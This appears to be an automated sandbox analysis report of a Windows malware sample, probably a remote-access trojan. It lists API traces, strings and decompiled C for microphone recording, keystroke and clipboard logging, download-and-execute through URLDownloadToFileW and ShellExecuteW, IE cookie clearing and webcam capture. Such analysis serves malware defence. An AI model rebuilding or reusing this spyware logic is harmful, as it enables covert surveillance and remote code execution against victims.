                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                    • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                  • String ID: %Y-%m-%d %H.%M$.wav
                                  • API String ID: 4079669728-3597965672
                                  • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                  • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406952, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                  • toupper.MSVCRT ref: 0040698A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                  • toupper.MSVCRT ref: 00406A61
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                  • tolower.MSVCRT ref: 00406A3A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                  Strings
                                  • [Ctrl + , xrefs: 00406996
                                  • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                  • [End of clipboard text], xrefs: 004069EC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                  • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                  • API String ID: 1567161615-398269065
                                  • Opcode ID: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                  • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                  • Opcode Fuzzy Hash: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                  • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D4E5, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 132filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                  • free.MSVCRT(?,0041BA5C,?), ref: 0040D643
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                  • String ID: open
                                  • API String ID: 2294739476-2758837156
                                  • Opcode ID: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                  • Opcode Fuzzy Hash: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407767, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 0040B522: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.ADVAPI32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                  • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 4038348890-4073444585
                                  • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                  • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410145, Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6B015DF0), ref: 0041016E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                  • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                    • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                    • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                    • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                  • String ID:
                                  • API String ID: 1196022968-0
                                  • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                  • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CCF, Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t32;
				char* _t33;
				void* _t36;
				void* _t38;
				signed char _t39;
				signed char _t41;
				char* _t42;
				int _t43;
				intOrPtr _t65;
				signed char _t66;
				void* _t68;
				intOrPtr* _t71;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t71 = _t68 + 0x24;
				_t22 = _t65 - 0x3c;
				if(_t22 == 0) {
					_t23 = E0040180C( &_v20, __eflags, 0);
					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t66 = E00406DD9(_t23);
					__eflags = _t66;
					if(_t66 != 0) {
						 *0x41b2ec = E00407033(_t66, "OpenCamera");
						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
						 *0x41b2f4 = E00407033(_t66, "GetFrame");
						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
						 *0x41b2e8 = 1;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
						_push(0x1b);
						goto L15;
					}
				} else {
					_t32 = _t22 - 1;
					if(_t32 == 0) {
						__eflags =  *0x41b2e9;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						_t36 = _t32 - 1;
						if(_t36 == 0) {
							 *0x41b2f0();
							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
						} else {
							_t38 = _t36 - 1;
							if(_t38 == 0) {
								_t39 =  *0x41b2ec();
								__eflags = _t39;
								 *0x41b2e9 = _t39;
								if(__eflags == 0) {
									goto L9;
								} else {
									L8:
									_t33 = E0040180C( &_v20, __eflags, 0);
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									_push(atoi(_t33));
									_push(_a4);
									E00401EA2(__eflags);
								}
							} else {
								if(_t38 == 1) {
									_t41 =  *0x41b2ec();
									_t81 = _t41;
									 *0x41b2e9 = _t41;
									if(_t41 == 0) {
										L9:
										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
										_push(0x41);
										L15:
										E004020C2(_a4);
									} else {
										_t42 = E0040180C( &_v20, _t81, 0);
										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
										_t43 = atoi(_t42);
										 *_t71 = 0x3e8;
										Sleep(??);
										E00401EA2(_t81);
										 *0x41b2f0(_a4, _t43);
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                  0x00401cd9
                                  0x00401cdf
                                  0x00401cf1
                                  0x00401d01
                                  0x00401d10
                                  0x00401d1a
                                  0x00401d21
                                  0x00401d24
                                  0x00401d27
                                  0x00401e08
                                  0x00401e0f
                                  0x00401e1b
                                  0x00401e1e
                                  0x00401e20
                                  0x00401e33
                                  0x00401e43
                                  0x00401e53
                                  0x00401e60
                                  0x00401e67
                                  0x00401e73
                                  0x00401e79
                                  0x00000000
                                  0x00401e79
                                  0x00401d2d
                                  0x00401d2d
                                  0x00401d2e
                                  0x00401df4
                                  0x00401dfb
                                  0x00000000
                                  0x00401e01
                                  0x00401d34
                                  0x00401d34
                                  0x00401d35
                                  0x00401de2
                                  0x00401de8
                                  0x00401d3b
                                  0x00401d3b
                                  0x00401d3c
                                  0x00401d92
                                  0x00401d98
                                  0x00401d9a
                                  0x00401d9f
                                  0x00000000
                                  0x00401da1
                                  0x00401da1
                                  0x00401da6
                                  0x00401dad
                                  0x00401dba
                                  0x00401dbb
                                  0x00401dbe
                                  0x00401dc3
                                  0x00401d3e
                                  0x00401d3f
                                  0x00401d45
                                  0x00401d4b
                                  0x00401d4d
                                  0x00401d52
                                  0x00401dcb
                                  0x00401dd5
                                  0x00401ddb
                                  0x00401e7b
                                  0x00401e7e
                                  0x00401d54
                                  0x00401d59
                                  0x00401d60
                                  0x00401d67
                                  0x00401d6f
                                  0x00401d76
                                  0x00401d80
                                  0x00401d87
                                  0x00401d87
                                  0x00401d52
                                  0x00401d3f
                                  0x00401d3c
                                  0x00401d35
                                  0x00401d2e
                                  0x00401e86
                                  0x00401e8e
                                  0x00401e97
                                  0x00401ea1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401CF1
